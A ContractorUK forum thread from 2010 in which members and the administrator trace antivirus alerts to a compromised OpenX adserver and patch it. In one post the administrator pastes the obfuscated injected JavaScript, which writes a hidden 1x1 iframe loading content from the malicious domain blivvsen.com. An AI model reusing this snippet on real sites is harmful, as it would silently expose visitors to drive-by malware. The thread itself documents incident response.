Originally posted by Zippy
View Post
- Visitors can check out the Forum FAQ by clicking this link. You have to register before you can post: click the REGISTER link above to proceed. To start viewing messages, select the forum that you want to visit from the selection below. View our Forum Privacy Policy.
- Want to receive the latest contracting news and advice straight to your inbox? Sign up to the ContractorUK newsletter here. Every sign up will also be entered into a draw to WIN £100 Amazon vouchers!
Reply to: Trojan from blivvsen com
Collapse
You are not logged in or you do not have permission to access this page. This could be due to one of several reasons:
- You are not logged in. If you are already registered, fill in the form below to log in, or follow the "Sign Up" link to register a new account.
- You may not have sufficient privileges to access this page. Are you trying to edit someone else's post, access administrative features or some other privileged system?
- If you are trying to post, the administrator may have disabled your account, or it may be awaiting activation.
Logging in...
Previously on "Trojan from blivvsen com"
Collapse
-
Originally posted by minestrone View PostYup, small dialog I never noiced on the screen "unable to open sex.avi" (was remoting into the machine)
Anyway, I just don't think what they tried will work, unless you have been mucking about with the plugin security setting and did not know what you were doing, they might get a few first year CS student I suppose (or a few Bobs )
So does the congregation think the intention was to sell us some low-grade porn?
Anyhoo if you daffodils are listening, I do my super-secret stuff on one of our other machines.
Leave a comment:
-
Originally posted by minestrone View PostI noticed the java plugin kick off last night and was not sure why, machine is still on in the house.
It's fully patched and up to date with windows security essentials though, should be fine.
Anyway, I just don't think what they tried will work, unless you have been mucking about with the plugin security setting and did not know what you were doing, they might get a few first year CS student I suppose (or a few Bobs )
Leave a comment:
-
Good stuff, glad no-one so far seems to have been hit badly with it. Must say, as Trojans go it was a bit of a wimpy one. Luckily. Will certainly be keeping on top on OpenX updates. Seen quite a few sites over the last few days hit with it so if you have any unpatched sites running OpenX then sort it quickly!
Leave a comment:
-
I noticed the java plugin kick off last night and was not sure why, machine is still on in the house.
It's fully patched and up to date with windows security essentials though, should be fine.
Leave a comment:
-
NOD32 went ape tulip last night and kept blocking bilsen url. Just ran a scan and nothing so pretty happy.
Leave a comment:
-
Originally posted by cojak View PostShould this affect us daywalkers?
Originally posted by d000hg View PostI don't remember what time I was on CUK last night. Any chance admin might be able to find a list of logged-in users in the danger period and contact them all - other users might have made an infrequent visit and not see this thread.
Is this trojan browser-specific? And I assume it targets Windows alone?
I would have thought Windows specific...
Leave a comment:
-
I don't remember what time I was on CUK last night. Any chance admin might be able to find a list of logged-in users in the danger period and contact them all - other users might have made an infrequent visit and not see this thread.
Is this trojan browser-specific? And I assume it targets Windows alone?
Leave a comment:
-
Just checked with an HTTP debugger and, even when I allow the ads through, nothing untoward is showing up now
Of note is that, when searching for blivvsen.com, this thread is currently the only content that appears on a Google search except for some robot that tracks new domain registrations.
The whois record for that domain is:
Code:Domain blivvsen.com Date Registered: 2010-9-16 Date Modified: 2010-9-17 Expiry Date: 2011-9-16 DNS1: ns1.blivvsen.com DNS2: ns2.blivvsen.com Registrant Private Whois Service Private Whois Service [email protected] *******PLEASE DO NOT SEND LETTERS****** ****Contact the owner by email only**** c/o blivvsen.com N4892 Nassau Bahamas Administrative Contact Private Whois Service Private Whois Service [email protected] *******PLEASE DO NOT SEND LETTERS****** ****Contact the owner by email only**** c/o blivvsen.com N4892 Nassau Bahamas Tel: +852.81720004 Technical Contact Private Whois Service Private Whois Service [email protected] *******PLEASE DO NOT SEND LETTERS****** ****Contact the owner by email only**** c/o blivvsen.com N4892 Nassau Bahamas Tel: +852.81720004 Registrar: Internet.bs Corp. Registrar's Website : <a href='http://www.internetbs.net/'>http://www.internetbs.net/</a>
Last edited by NickFitz; 21 September 2010, 02:11.
Leave a comment:
-
Originally posted by Zippy View PostDon't worry. If the little bastard has got me I'll sort it.
Originally posted by blacjac View PostNice one administrator
Code:root@cukmain:~/openx/20100919# ls -al total 159984 drwxr-xr-x 3 root root 4096 Sep 19 22:18 . drwxr-xr-x 6 root root 4096 Sep 21 01:39 .. -rw-r--r-- 1 root root 154185110 Sep 19 21:59 cukopenx.sql drwxr-xr-x 10 500 500 4096 Sep 19 22:04 openx-2.8.0 -rw-r--r-- 1 root root 9452354 Apr 29 2009 openx-2.8.0.tar.gz
Still, at least no-one else will get had when the forum and main site (adserver covers the main site too) gets busier in the morning.
Thanks to you all for letting me know and helping track it down. Apologies again to the infected, hope it is no more than an AV clean up job for you and no system rebuilds needed...
Leave a comment:
-
Originally posted by administrator View PostSend me the invoice if you have to pay for it...
I did the free trial of Kaspersky as Owlhoot said it was warning him of problems, they do a free trial Did the updates and quick scan showing nothing and full scan showing no problems so far either.
Pig tulip. Found the problem. Is the adserver:
Code:<script language="JavaScript">var dc=document; var date_ob=new Date(); dc.cookie='h1=o; path=/;';if(dc.cookie.indexOf('3=llo') <= 0 && dc.cookie.indexOf('1=o') > 0){\ function clng(wrd){var cou=new Array('en-us','en-ca','en-au','en-gb','fr-ca','fr','de','es','it');for(i=0;i<cou.length;i++){if(wrd==cou[i])return true;}return false;}\ if(typeof navigator.language == 'undefined'){var nav = navigator.userLanguage} else {var nav = navigator.language;}\ if(typeof run == 'undefined'&&clng(nav.toLowerCase())){dc.writeln("<script type=\\"text/javascript\\"><!--");dc.writeln("var host=' widt'+'h=1 h'+'eight'+'=1 '; var src='src='; var brdr='fra'+'mebor'+'der='+'0';var sc='\\"http://blivvsen. com/shuffle/index.php?s=IBB@G\\" ';");dc.writeln("document.write('<ifr'+'ame'+host+src+sc+brdr+'\\"></ifra'+'me>');");dc.writeln("//--><\\/script>");} var run=1;\ date_ob.setTime(date_ob.getTime()+86400000);dc.cookie='h3=llo; path=/; expires='+date_ob.toGMTString();}</script>
Sorry all, very disappointed with myself for not spotting sooner.
Leave a comment:
-
Originally posted by blacjac View PostNo probs, but why can't I seem to get my screenshot to work inline?
Leave a comment:
- Home
- News & Features
- First Timers
- IR35 / S660 / BN66
- Employee Benefit Trusts
- Agency Workers Regulations
- MSC Legislation
- Limited Companies
- Dividends
- Umbrella Company
- VAT / Flat Rate VAT
- Job News & Guides
- Money News & Guides
- Guide to Contracts
- Successful Contracting
- Contracting Overseas
- Contractor Calculators
- MVL
- Contractor Expenses
Advertisers
Contractor Services
CUK News
- How 15% employer NICs will sting the umbrella company market Yesterday 09:16
- Contracting Awards 2024 hails 19 firms as best of the best Nov 18 09:13
- How to answer at interview, ‘What’s your greatest weakness?’ Nov 14 09:59
- Business Asset Disposal Relief changes in April 2025: Q&A Nov 13 09:37
- How debt transfer rules will hit umbrella companies in 2026 Nov 12 09:28
- IT contractor demand floundering despite Autumn Budget 2024 Nov 11 09:30
- An IR35 bill of £19m for National Resources Wales may be just the tip of its iceberg Nov 7 09:20
- Micro-entity accounts: Overview, and how to file with HMRC Nov 6 09:27
- Will HMRC’s 9% interest rate bully you into submission? Nov 5 09:10
- Business Account with ANNA Money Nov 1 15:51
Leave a comment: